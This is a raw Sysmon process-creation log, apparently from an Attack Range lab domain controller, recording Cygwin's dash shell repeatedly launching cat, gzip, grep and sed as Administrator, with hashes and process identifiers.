14:55:56.326{A8622C2F-53FC-6078-A009-00000000AE01}5800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050133Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.318{A8622C2F-53FC-6078-9F09-00000000AE01}1408C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-9D09-00000000AE01}5084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050115Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.310{A8622C2F-53FC-6078-9E09-00000000AE01}6808C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-9B09-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050113Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.310{A8622C2F-53FC-6078-9D09-00000000AE01}5084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050094Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.303{A8622C2F-53FC-6078-9C09-00000000AE01}3208C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-9A09-00000000AE01}6968C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050093Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.303{A8622C2F-53FC-6078-9B09-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050081Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.296{A8622C2F-53FC-6078-9A09-00000000AE01}6968C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050069Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.288{A8622C2F-53FC-6078-9909-00000000AE01}1476C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-9809-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050059Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.281{A8622C2F-53FC-6078-9809-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050047Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.273{A8622C2F-53FC-6078-9709-00000000AE01}4832C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-9509-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050029Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.266{A8622C2F-53FC-6078-9609-00000000AE01}5620C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-9309-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050027Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.265{A8622C2F-53FC-6078-9509-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050008Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.258{A8622C2F-53FC-6078-9409-00000000AE01}2664C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-9209-00000000AE01}5396C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000050007Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.258{A8622C2F-53FC-6078-9309-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049995Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.251{A8622C2F-53FC-6078-9209-00000000AE01}5396C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.244{A8622C2F-53FC-6078-9109-00000000AE01}3304C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-9009-00000000AE01}5052C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049973Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.237{A8622C2F-53FC-6078-9009-00000000AE01}5052C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.228{A8622C2F-53FC-6078-8F09-00000000AE01}7140C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-8D09-00000000AE01}2112C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049943Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.221{A8622C2F-53FC-6078-8E09-00000000AE01}4364C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-8B09-00000000AE01}3368C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049941Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.221{A8622C2F-53FC-6078-8D09-00000000AE01}2112C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049922Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.214{A8622C2F-53FC-6078-8C09-00000000AE01}5312C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-8A09-00000000AE01}1408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049921Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.214{A8622C2F-53FC-6078-8B09-00000000AE01}3368C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049909Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.207{A8622C2F-53FC-6078-8A09-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049897Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.199{A8622C2F-53FC-6078-8909-00000000AE01}5996C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-8809-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049887Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.192{A8622C2F-53FC-6078-8809-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049875Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.184{A8622C2F-53FC-6078-8709-00000000AE01}5852C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-8509-00000000AE01}616C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049857Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.176{A8622C2F-53FC-6078-8609-00000000AE01}4604C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-8309-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049855Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.176{A8622C2F-53FC-6078-8509-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049837Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.169{A8622C2F-53FC-6078-8409-00000000AE01}3156C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-8209-00000000AE01}4832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049835Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.169{A8622C2F-53FC-6078-8309-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049823Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.162{A8622C2F-53FC-6078-8209-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049811Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.154{A8622C2F-53FC-6078-8109-00000000AE01}1800C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-8009-00000000AE01}1612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049801Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.147{A8622C2F-53FC-6078-8009-00000000AE01}1612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049789Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.139{A8622C2F-53FC-6078-7F09-00000000AE01}2084C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-7D09-00000000AE01}6748C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049771Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.131{A8622C2F-53FC-6078-7E09-00000000AE01}6240C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-7B09-00000000AE01}3912C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049769Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.131{A8622C2F-53FC-6078-7D09-00000000AE01}6748C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049750Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.124{A8622C2F-53FC-6078-7C09-00000000AE01}4476C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-7A09-00000000AE01}6076C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049749Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.124{A8622C2F-53FC-6078-7B09-00000000AE01}3912C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049737Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.117{A8622C2F-53FC-6078-7A09-00000000AE01}6076C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049725Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.109{A8622C2F-53FC-6078-7909-00000000AE01}4288C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-7809-00000000AE01}4696C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049715Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.102{A8622C2F-53FC-6078-7809-00000000AE01}4696C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049703Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.093{A8622C2F-53FC-6078-7709-00000000AE01}5116C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-7509-00000000AE01}1392C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049685Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 